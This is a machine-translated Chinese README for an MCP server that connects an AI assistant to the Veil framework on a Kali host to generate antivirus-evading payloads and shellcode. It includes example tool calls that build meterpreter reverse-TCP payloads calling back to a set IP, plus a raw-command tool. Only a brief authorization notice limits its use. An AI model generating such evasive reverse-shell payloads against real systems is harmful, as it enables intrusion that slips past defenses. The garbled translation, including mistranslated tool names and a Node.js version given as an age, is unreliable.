面纱规避MCP服务器
  ](https://nodejs.org) 
概述
此MCP服务器使AI助手能够与Veil进行交互以进行安全测试,提供以下工具:
- 列出可用的有效载荷类型和工具
- 生成躲避AV的有效载荷
- 创建自定义外壳代码
- 管理生成的工件
- 根据VirusTotal检查有效载荷哈希值(仅哈希值,不上传)
需求
- Node.js 18岁或以上
- SSH访问 安装了Veil 3.x的Kali Linux主机
- 基于SSH密钥的身份验证 为Kali主机配置
安装
# Clone the repository
git clone https://github.com/schwarztim/sec-veil-evasion-mcp.git
cd sec-veil-evasion-mcp
# Install dependencies
npm install
# Build the TypeScript source
npm run build配置
环境变量
| 变量 | 描述 | 默认值 |
|---|---|---|
VEIL_KALI_HOST | Kali Linux的SSH主机名 | kali |
VEIL_PATH | 卡利岛上的面纱之路 | /usr/share/veil/Veil.py |
Claude桌面配置
添加到您的Claude Desktop配置(~/.config/claude/claude_desktop_config.json 在Linux或 ~/Library/Application Support/Claude/claude_desktop_config.json 在macOS上):
{
"mcpServers": {
"veil-evasion": {
"command": "node",
"args": ["/path/to/sec-veil-evasion-mcp/dist/index.js"],
"env": {
"VEIL_KALI_HOST": "your-kali-hostname",
"VEIL_PATH": "/usr/share/veil/Veil.py"
}
}
}
}可用工具
面纱列表工具
列出可用的面纱工具(躲避、军械)。
veil_list_payloads
列出特定工具的所有可用有效载荷。
tool(必填):"Evasion"或"Ordnance"
面纱_面纱_信息
获取特定有效载荷的详细信息。
tool(必填):"Evasion"或"Ordnance"payload(必填):有效载荷名称或编号
面纱生成
使用指定选项生成有效载荷。
tool(必填):"Evasion"或"Ordnance"payload(必填):有效载荷名称或编号lhost(必填):回拨IP地址lport:回调端口(默认值:4444)output_name:输出文件的基本名称shellcode_method:"msfvenom"或"ordnance"msfvenom_payload:MSFVenom有效载荷字符串custom_options:其他有效载荷选项
面纱生成外壳代码
仅使用面纱军械生成外壳代码。
payload(必填):军械有效载荷类型lhost(必填):回拨IPlport:回调端口(默认值:4444)encoder:要使用的编码器iterations:编码迭代
面纱_检查_灰烬
对照VirusTotal检查有效载荷哈希(仅哈希,不上传)。
file_path(必需):Kali上有效载荷文件的路径
面纱清洁
清理生成的有效载荷和工件。
clean_all:如果为true,则清除所有文件(默认值:true)
veil_list_已生成
列出所有以前生成的有效载荷。
面纱版本
获取Veil框架版本信息。
面纱更新
更新Veil框架。
veil_raw_命令
执行原始Veil命令以进行高级使用。
args(必需):命令行参数
使用示例
列出可用有效载荷
veil_list_payloads { "tool": "Evasion" }生成反向TCP有效负载
veil_generate {
"tool": "Evasion",
"payload": "go/meterpreter/rev_tcp",
"lhost": "192.168.1.100",
"lport": 4444,
"output_name": "test_payload"
}生成外壳代码
veil_generate_shellcode {
"payload": "rev_tcp",
"lhost": "192.168.1.100",
"lport": 443
}建筑
┌─────────────────┐ SSH ┌─────────────────┐
│ Claude/MCP │──────────────│ Kali Linux │
│ Client │ │ + Veil 3.x │
└─────────────────┘ └─────────────────┘
│
▼
┌─────────────────┐
│ veil-evasion │
│ MCP Server │
└─────────────────┘服务器通过SSH在远程Kali Linux主机上执行Veil命令,允许从任何具有SSH访问权限的系统安全生成有效载荷。
安全通知
此工具仅用于授权渗透测试和安全研究。
- 在测试您不拥有的系统之前,始终获得适当的书面授权
- 未经明确许可,不得对系统使用生成的有效载荷
- 遵守您所在司法管辖区的所有适用法律法规
- 作者不对误用此工具负责
发展
# Watch mode for development
npm run dev
# Build the project
npm run build
# Run the server
npm start许可证
MIT许可证-请参阅 许可证 了解详情。
相关项目
- 面纱框架 -基础有效载荷生成框架
- 模型上下文协议 -协议规范
- MCP TypeScript SDK -用于构建此服务器的SDK
贡献
欢迎投稿!请随时提交拉取请求。
- 克隆该仓库
- 创建功能分支(
git checkout -b feature/amazing-feature) - 提交您的更改(
git commit -m 'Add some amazing feature') - 推到分支(
git push origin feature/amazing-feature) - 打开拉取请求
